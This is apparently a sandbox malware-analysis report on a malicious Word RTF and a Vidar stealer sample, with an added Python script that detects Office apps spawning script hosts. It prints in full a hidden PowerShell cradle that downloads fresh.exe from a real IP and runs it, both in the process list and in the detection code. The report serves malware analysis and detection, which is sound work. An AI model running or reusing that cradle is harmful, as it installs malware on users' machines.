| Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE |
| Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Office loads VBA resources, possible macro or embedded object present
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\57bb59a2c491b89b3321428121ba1b5e88daca5a8e379fde41afc73e9679d752.rtf"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://136.144.41.61/fresh.exe','C:\Users\Admin\AppData\Roaming\fresh.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\fresh.exe'"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://136.144.41.61/fresh.exe','C:\Users\Admin\AppData\Roaming\fresh.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\fresh.exe'"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://136.144.41.61/fresh.exe','C:\Users\Admin\AppData\Roaming\fresh.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\fresh.exe'"
C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
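The "Process spawned unexpected child process" signature above fires because WINWORD.EXE, opened on the RTF, launched powershell.exe three times with a hidden window, -ExecutionPolicy bypass and a WebClient.DownloadFile cradle that fetches fresh.exe from 136.144.41.61 into the user's Roaming profile and starts it. The Python below is an added example, not Triage's detection logic and not code from the sample. It reproduces both checks over constructed process records: the parent/child rule for Office applications spawning script hosts, and a parser that pulls the stealth switches, download URL and dropped path out of the PowerShell command line. PIDs and parent links are constructed; the image paths and command lines are those shown above (the mixed-case `httP://` is kept as the sample wrote it); splwow64.exe is included as a child the rule must not flag.

```python
import re
from dataclasses import dataclass, field


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int
    image: str
    cmdline: str


# Office binaries that should not be launching script hosts or LOLBins.
OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}

# PowerShell accepts any unambiguous prefix of a switch name, so match the
# shortest common abbreviations (-W, -NoP, -NonI, -ep) case-insensitively.
STEALTH_SWITCHES = {
    "WindowStyle Hidden": re.compile(r"-w\S*\s+hidden", re.I),
    "NoProfile": re.compile(r"-nop\S*", re.I),
    "NonInteractive": re.compile(r"-noni\S*", re.I),
    "ExecutionPolicy Bypass": re.compile(r"-e\S*\s+bypass", re.I),
}
URL_RE = re.compile(r"""(?:https?|ftp)://[^\s'")]+""", re.I)
DOWNLOADFILE_RE = re.compile(r"DownloadFile\(\s*'([^']+)'\s*,\s*'([^']+)'\s*\)", re.I)
START_PROCESS_RE = re.compile(r"Start-Process\s+'([^']+)'", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def unexpected_office_children(procs) -> list:
    """Return (parent, child) pairs where an Office app spawned a script host."""
    by_pid = {p.pid: p for p in procs}
    pairs = []
    for child in procs:
        parent = by_pid.get(child.ppid)
        if parent is None:
            continue
        if basename(parent.image) in OFFICE_IMAGES and basename(child.image) in SCRIPT_HOSTS:
            pairs.append((parent, child))
    return pairs


@dataclass
class CradleReport:
    stealth_switches: list = field(default_factory=list)
    urls: list = field(default_factory=list)
    dropped_paths: list = field(default_factory=list)
    executes_download: bool = False   # a DownloadFile target is also Start-Process'd


def analyze_powershell(cmdline: str) -> CradleReport:
    """Extract stealth switches, URLs and the drop-then-execute chain."""
    report = CradleReport()
    report.stealth_switches = [name for name, rx in STEALTH_SWITCHES.items() if rx.search(cmdline)]
    report.urls = URL_RE.findall(cmdline)
    report.dropped_paths = [dst for _url, dst in DOWNLOADFILE_RE.findall(cmdline)]
    started = {p.lower() for p in START_PROCESS_RE.findall(cmdline)}
    report.executes_download = any(d.lower() in started for d in report.dropped_paths)
    return report


def triage(procs) -> list:
    """One finding per Office -> script-host edge, with cradle details for PowerShell."""
    findings = []
    for parent, child in unexpected_office_children(procs):
        entry = {"parent": basename(parent.image), "child": basename(child.image),
                 "child_pid": child.pid}
        if basename(child.image) in ("powershell.exe", "pwsh.exe"):
            entry["cradle"] = analyze_powershell(child.cmdline)
        findings.append(entry)
    return findings


# Constructed process records modelled on the tree in this run. PIDs and parent
# links are made up; images and command lines are those listed above.
_WINWORD = r"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"
_RTF = r"C:\Users\Admin\AppData\Local\Temp\57bb59a2c491b89b3321428121ba1b5e88daca5a8e379fde41afc73e9679d752.rtf"
_PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
_CRADLE = (r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI '''
           r'''-W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient)'''
           r'''.DownloadFile('httP://136.144.41.61/fresh.exe','C:\Users\Admin\AppData\Roaming\fresh.exe');'''
           r'''Start-Process 'C:\Users\Admin\AppData\Roaming\fresh.exe'"''')
SAMPLE_PROCS = [
    Proc(1000, 900, _WINWORD, '"' + _WINWORD + '" /n "' + _RTF + '"'),
    Proc(1001, 1000, _PS, _CRADLE),
    Proc(1002, 1000, _PS, _CRADLE),
    Proc(1003, 1000, _PS, _CRADLE),
    Proc(1004, 1000, r"C:\Windows\splwow64.exe", r"C:\Windows\splwow64.exe 12288"),
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_PROCS):
        print(finding)
```

The three powershell.exe children are reported with all four stealth switches, the URL, the dropped path and executes_download set; splwow64.exe is not reported. The switch regexes are deliberately loose because PowerShell accepts prefixes, so treat them as a triage aid rather than a precise parser, and keep the download URL and dropped path (rather than the exact command line) as the indicators to pivot on.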
Network
| Country | Destination | Domain | Proto |
| N/A | 136.144.41.61:80 | 136.144.41.61 | tcp |
| N/A | 136.144.41.61:80 | 136.144.41.61 | tcp |
| N/A | 136.144.41.61:80 | 136.144.41.61 | tcp |
| N/A | 136.144.41.61:80 | 136.144.41.61 | tcp |
Files
memory/1028-59-0x0000000072491000-0x0000000072494000-memory.dmp
memory/1028-60-0x000000006FF11000-0x000000006FF13000-memory.dmp
memory/1028-61-0x000000005FFF0000-0x0000000060000000-memory.dmp
memory/1028-62-0x0000000075591000-0x0000000075593000-memory.dmp
memory/832-63-0x0000000000000000-mapping.dmp
memory/832-65-0x0000000001F40000-0x0000000001F41000-memory.dmp
memory/832-66-0x0000000004880000-0x0000000004881000-memory.dmp
memory/832-67-0x0000000002540000-0x0000000002541000-memory.dmp
memory/832-68-0x0000000004840000-0x0000000004841000-memory.dmp
memory/832-69-0x0000000004842000-0x0000000004843000-memory.dmp
memory/832-70-0x0000000005240000-0x0000000005241000-memory.dmp
memory/832-73-0x0000000005660000-0x0000000005661000-memory.dmp
memory/832-78-0x0000000005700000-0x0000000005701000-memory.dmp
memory/832-79-0x00000000061E0000-0x00000000061E1000-memory.dmp
memory/832-86-0x0000000006280000-0x0000000006281000-memory.dmp
memory/832-87-0x000000007EF30000-0x000000007EF31000-memory.dmp
memory/1784-88-0x0000000000000000-mapping.dmp
memory/832-91-0x00000000062C0000-0x00000000062C1000-memory.dmp
memory/1012-90-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | cef21d1181dd020d66c871fade090fbd |
| SHA1 | e46ac816105c5894395c6a60364d13978cb6e418 |
| SHA256 | 0a00cc823d9aab8e9be994f6464ed327afe9e68b93394c1b2503a13ac2d48ce8 |
| SHA512 | 9f3499bf40d51105c784724e9afd14c2f364950ee185c338edf63c5a07ba5047ee166d97c62dcb68e59e0a2ab10332289d6fa047bd105827e87ba0b3340ae6b5 |
memory/1012-97-0x0000000001F80000-0x0000000002BCA000-memory.dmp
memory/1012-98-0x0000000001F80000-0x0000000002BCA000-memory.dmp
memory/832-100-0x0000000006440000-0x0000000006441000-memory.dmp
memory/832-114-0x00000000065B0000-0x00000000065B1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_bc2fe8ee-69c0-48ce-8821-1fab80ab4eeb
| MD5 | 597009ea0430a463753e0f5b1d1a249e |
| SHA1 | 4e38b8bb65ecbd5c9f0d3d8c47f7caba33de6c62 |
| SHA256 | 3fd2a8217a845c43dbc0dc206c28be81d2687aa9ba62019d905aef10cfaec45d |
| SHA512 | 5d722fa908e64575b2497c60d142e182011a10c6ed33813b3b4796b3147ece1bc96938518b4c8911a1bac3b7560528ebe3e8e754c11015516d335df5d7c6871d |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fd9bf4da-ec38-4847-85c5-d50f35796d4c
| MD5 | a725bb9fafcf91f3c6b7861a2bde6db2 |
| SHA1 | 8bb5b83f3cc37ff1e5ea4f02acae38e72364c114 |
| SHA256 | 51651f27f54c7261887037aa1de4eff0a26c6807906dfc34a15cd5a0b58a8431 |
| SHA512 | 1c4b21dd5660bfec8347257bb3da64681b0a97c427790d9ab3484f687dac032bcff0e07876635953697b00cf83e7d37f97c44e0219627fd0533f60ed3024b97e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4375eeb7-a65d-43f1-a616-02c5ad6c5370
| MD5 | be4d72095faf84233ac17b94744f7084 |
| SHA1 | cc78ce5b9c57573bd214a8f423ee622b00ebb1ec |
| SHA256 | b0d72c5c22e57913476ac8fc686a4593f137c6667d5094522c0a0685dabd7adc |
| SHA512 | 43856e9b1032b8690ceea810c931bed3655e9190414bb220fb6afc136f31b8335e07604dffb28405d4006f266a54cff424c527d29924b1b732c9647a3252b097 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fa12b0a1-3d6a-4bab-a74a-253a75ca0598
| MD5 | 5e3c7184a75d42dda1a83606a45001d8 |
| SHA1 | 94ca15637721d88f30eb4b6220b805c5be0360ed |
| SHA256 | 8278033a65d1ff48be4d86e11f87930d187692f59f8bf2f0a9d170de285afb59 |
| SHA512 | fae99b6e9b106e0f1c30aa4082b25ae1ad643455c1295c2c16ad534e3e611b9b08492353ffe1af1cfdddc9b2b7c330747a64012c45e62b8f4a4982dcc214e05b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6fe5bd95-2cea-4aea-9c8c-dd67bac4295b
| MD5 | df44874327d79bd75e4264cb8dc01811 |
| SHA1 | 1396b06debed65ea93c24998d244edebd3c0209d |
| SHA256 | 55de642c5c9e436ec01c57004dae797022442c3245daf7162d19a5585f221181 |
| SHA512 | 95dc9298b8db059bbe746f67e6a7f8515781c7053cc60c01532e47623a996be7e1bd23d1bd8f5f2045adff27454f44930d503c15b695690088841cedbd2a06c3 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1602f747-c1a3-4345-8dec-4dcb8b1f72e5
| MD5 | 02ff38ac870de39782aeee04d7b48231 |
| SHA1 | 0390d39fa216c9b0ecdb38238304e518fb2b5095 |
| SHA256 | fbd66a9baf753db31b8de23f2d51b67f8676687503653103080c45b16f1dc876 |
| SHA512 | 24a1ff76ee42ff7a5ea42843928c4df07b06178f7781cd840e1e086e88735d81506eb67259ff1e6ce5aaa7c5baea03886da265eb7e025ff4dc4c4b5f8cd3e341 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2d686436-375c-4ee1-bd4a-9e44ccd248ba
| MD5 | 75a8da7754349b38d64c87c938545b1b |
| SHA1 | 5c28c257d51f1c1587e29164cc03ea880c21b417 |
| SHA256 | bf08151c174b5d00c9dbc7907b2c6a01b4be76bfa3afce1e8bd98a04ad833c96 |
| SHA512 | 798797bc74c56c874e9a5fdcb0157c04e37a1b3cce285ef064b01bceef8cec45f11a5198918c6c647220b62883606b5e12e3cca3ea369f3a66e69dea6e15f643 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fe80cd26-0cf7-4e38-9884-6dab53b04ca9
| MD5 | b6d38f250ccc9003dd70efd3b778117f |
| SHA1 | d5a17c02cac698d4f0a4a9b7d71db2aa19e3f18a |
| SHA256 | 4de9d7b5ccab7b67ca8efc83084c7ee6e5e872b7216ed4683bc5da950bf41265 |
| SHA512 | 67d8195836b7f280d3f9219fd0f58276342e55d5dfdd8a4c54355030d96685d73f1b2b6da0eb39322ec7c3a1d1c5ef06b52d22646cea30a96f822de1800d31e9 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
| MD5 | cdf5dc3275e7507713fc242455d8bfbd |
| SHA1 | fef30fb16b6fb9128e13ba21ff81ce6423cd1832 |
| SHA256 | 7c72acae5b15108438dc287cfa7dcc8e1ca1e08c3ae132be6267e4332fac5738 |
| SHA512 | 7ac8ec6481687acec33c6ab5a5bd2aceb7920fd135447c742a0b1aac947a33e123118f80eaf49b151d1e045cff1cfcd98640d1fd617c12911d9d4064e5e60373 |
memory/832-115-0x00000000065C0000-0x00000000065C1000-memory.dmp
memory/1012-126-0x00000000064C0000-0x00000000064C1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_be83a4e2-1974-456b-b09a-a1d1479761a9
| MD5 | 7f79b990cb5ed648f9e583fe35527aa7 |
| SHA1 | 71b177b48c8bd745ef02c2affad79ca222da7c33 |
| SHA256 | 080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683 |
| SHA512 | 20926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b2a13e59-7333-473f-9b18-d066041a3fdf
| MD5 | d89968acfbd0cd60b51df04860d99896 |
| SHA1 | b3c29916ccb81ce98f95bbf3aa8a73de16298b29 |
| SHA256 | 1020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9 |
| SHA512 | b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4bb811cf-5419-41d0-88cd-6e71b61856dd
| MD5 | 354b8209f647a42e2ce36d8cf326cc92 |
| SHA1 | 98c3117f797df69935f8b09fc9e95accfe3d8346 |
| SHA256 | feae405d288fdd38438f9d9b54f791f3ce3805f1bb88780da5aca402ad372239 |
| SHA512 | 420be869b58e9a7a2c31f2550ac269df832935692a6431d455a10d9b426781e79d91e30ace2c465633b8a7ff2be1bf49734d8b99a390090dc4b36411d4391ff0 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_0b33b38c-206d-450a-aaaf-35c32459baf4
| MD5 | a70ee38af4bb2b5ed3eeb7cbd1a12fa3 |
| SHA1 | 81dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9 |
| SHA256 | dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d |
| SHA512 | 8c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3 |
memory/1784-132-0x00000000023F0000-0x00000000023F1000-memory.dmp
memory/1784-133-0x0000000004920000-0x0000000004921000-memory.dmp
memory/1784-134-0x0000000002720000-0x0000000002721000-memory.dmp
memory/1784-135-0x0000000005300000-0x0000000005301000-memory.dmp
memory/1784-136-0x0000000006070000-0x0000000006071000-memory.dmp
memory/936-138-0x0000000000000000-mapping.dmp
memory/936-139-0x000007FEFB991000-0x000007FEFB993000-memory.dmp
Analysis: behavioral31
Detonation Overview
Submitted
2021-07-30 15:26
Reported
2021-07-30 15:35
Platform
win10v20210408
Max time kernel
17s
Max time network
126s
Command Line
Signatures
Vidar
Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3492 set thread context of 2584 | N/A | C:\Users\Admin\AppData\Local\Temp\8cecb6b01aa0456667f940b42f7e394902c7b4da6f7597c5e9ca8a45f7e646d0.exe | C:\Users\Admin\AppData\Local\Temp\8cecb6b01aa0456667f940b42f7e394902c7b4da6f7597c5e9ca8a45f7e646d0.exe |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\8cecb6b01aa0456667f940b42f7e394902c7b4da6f7597c5e9ca8a45f7e646d0.exe |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\8cecb6b01aa0456667f940b42f7e394902c7b4da6f7597c5e9ca8a45f7e646d0.exe
"C:\Users\Admin\AppData\Local\Temp\8cecb6b01aa0456667f940b42f7e394902c7b4da6f7597c5e9ca8a45f7e646d0.exe"
C:\Users\Admin\AppData\Local\Temp\8cecb6b01aa0456667f940b42f7e394902c7b4da6f7597c5e9ca8a45f7e646d0.exe
C:\Users\Admin\AppData\Local\Temp\8cecb6b01aa0456667f940b42f7e394902c7b4da6f7597c5e9ca8a45f7e646d0.exe
C:\Users\Admin\AppData\Local\Temp\8cecb6b01aa0456667f940b42f7e394902c7b4da6f7597c5e9ca8a45f7e646d0.exe
C:\Users\Admin\AppData\Local\Temp\8cecb6b01aa0456667f940b42f7e394902c7b4da6f7597c5e9ca8a45f7e646d0.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2584 -s 24
Network
Files
memory/3492-114-0x0000000000420000-0x0000000000421000-memory.dmp
memory/3492-116-0x0000000004DF0000-0x0000000004DF1000-memory.dmp
memory/3492-117-0x0000000004DC0000-0x0000000004DC1000-memory.dmp
memory/3492-118-0x0000000004D70000-0x0000000004DE6000-memory.dmp
memory/2584-119-0x0000000000400000-0x00000000004A1000-memory.dmp
memory/2584-120-0x000000000046B76D-mapping.dmp